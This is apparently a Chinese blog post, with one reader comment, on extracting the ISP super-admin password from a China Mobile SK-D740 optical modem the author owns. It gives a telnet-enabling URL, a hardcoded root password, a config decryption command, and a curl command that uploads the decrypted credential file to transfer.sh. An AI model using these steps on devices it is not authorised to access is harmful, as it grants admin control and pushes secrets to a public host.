移动SK-D740以及类似型号的超管密码获取
网上几乎所有教程都是FTP,我手上这款和教程完全对不上,在咸鱼付费获取了密码一次,也是完全重制的方法
方法
简要流程:开启telnet->获取root->导出配置并上传
第一步:给你的路由器后背拍张照
开启telnet
确保可以访问光猫后台页,访问http://192.168.1.1/web/cmcc/gch/telnetCfg_gch.gch?TS_Enable=1开启telnet
登陆telnet
打开终端,输入: telnet 你的光猫地址
账号为admin,密码是路由器后背的sn码,SN:XXXX,按回车登陆,出现$代表登陆成功
获取root并上传配置文件
输入 su
,密码是: aDm8H%MdA
(祖传),出现#
依次输入
# 解密 db_user_cfg.xml 配置文件
sidbg 1 DB decry /userconfig/cfg/db_user_cfg.xml
# 将解密后的文件传输到 transfer.sh,(网站访问不稳定,可能出现上传失败,多试几次)
curl -v -k --upload-file /tmp/debug-decry-cfg https://transfer.sh/debug.xml
登陆curl最后一行给出的地址,下载配置文件
用任意编辑器打开,搜索 CMCCAdmin ,即可找到密码
不用上传
使用vi,cat等命令其实也能看,但文件确实比较大,看起来应该比较痛苦
没有测试过这个文件的行数是不是固定的,如果是固定的,使用sed命令访问1539与1540行同样可以得到密码
HOLY SHIT
1月搞了个志强E5+华南主板的家里云计划,最终赶在开学前也算是把电脑给装起来了,同时,如何尽可能利用现有网络(移动)连接家里云也是计划之中的事。最简单便捷的方法就是使用公网ipv6,而现实是存在v6防火墙,使☁️无法被外网访问。前两天斥资30在闲鱼上破解了光猫密码并改为桥接,但发现使用桥接时,网络下行只能跑到100M(正常500+),遂使用更保守的使用光猫拨号+修改光猫的IPv6Session防火墙,但光猫只要断电重启,防火墙设置就会恢复,解决方法有(1.telnet中添加自启脚本(存在校验,可能需要刷固件(无相关)/风险大),2.删除TR069(担心出问题时无法正常下发配置),3.每次断电后进后台重新关闭防火墙(需要稳定的超管密码))
a
2024-07-24请问配置文件里搜不到CMCCAdmin,甚至User都搜不到怎么办